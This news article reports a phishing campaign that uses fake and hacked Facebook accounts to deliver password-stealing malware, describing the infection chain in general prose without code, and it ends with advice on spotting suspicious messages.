One of the best and worst things about social media platforms like Facebook is that anyone can send you a message. While most of the time these unsolicited messages will come from old classmates and friends, they can also be sent by hackers.
As reported by BleepingComputer, hackers are using a massive network of fake and hacked Facebook accounts to send out phishing messages with the end goal of tricking people into installing password-stealing malware.
While this new campaign discovered by Guardio Labs is specifically targeting Facebook Business accounts, it still highlights the risk of opening and responding to unsolicited messages on Facebook and other social media platforms.
Using Facebook for phishing
Just like with other phishing campaigns we’ve observed in the past, this one uses copyright violation notices to get the attention of vulnerable business owners. However, information on particular products sold by a business is another lure being used in this campaign.
Following their initial messages, the hackers send over a batch file as a RAR or ZIP attachment with the hope that unsuspecting users may download and launch it. If they do, the batch file then fetches a malware dropper from GitHub to infect their systems with password-stealing malware.
Alongside the payload, the batch file also downloads a standalone Python environment that allows the malware to gain a foothold on an infected computer by executing each time the system starts up. As Guardio Labs points out in a blog post detailing its findings, the payload has five layers of obfuscation which makes it difficult for even the best antivirus software to detect it.
After infecting a vulnerable computer, the malware used in this campaign collects all of the cookies and login data stored in a victim’s browser. This information is then compiled into a ZIP file and sent back to the hackers responsible using Telegram or the Discord bot API. However, the malware goes a step further by wiping all cookies from a victim’s computer to log them out of their accounts. This gives the hackers the time they need to change the passwords to all of a victim’s accounts and take them over.
According to Guardio Labs’ researchers, around 100,000 phishing messages are sent out each week targeting Facebook users in North America, Europe, Australia, Japan and Southeast Asia. To make matters worse, 7% of all Facebook Business accounts have been targeted, though just 0.4% have downloaded the malicious file used to infect their systems with malware.
How to stay safe from phishing campaigns spreading malware
Just like when checking your inbox, you need to be extremely careful when dealing with messages on Facebook and other social media sites from unknown senders.
To determine if a message is genuine or not you should look out for red flags like misspelt words and poor grammar along with a sense of urgency. The last one is the most important as hackers often try to use your emotions against you in order to trick you into clicking on their messages or downloading the attachments they’ve sent you.
In the campaign described above, the hackers responsible used fake copyright violations as a means to create a sense of urgency. Facebook Business users that are worried about being hit with a copyright lawsuit might download and open the attached batch file without thinking, which is an easy way to infect their systems with malware. Even if you’re not a business owner, you shouldn’t open any attachments or even images sent to you from someone you don’t know on social media.
Malware can often evade antivirus software and for this reason, you may also want to invest in one of the best identity theft protection services as they can help you recover from any financial losses suffered as a result of fraud or online scams.
With three billion users worldwide as of August of this year according to Statista, Facebook remains one of the most popular social media platforms. Unfortunately though, its massive size and user base means that it will likely continue to be a treasure trove for hackers. However, it’s up to you to read your messages carefully and avoid opening and responding to any that appear to come from hackers.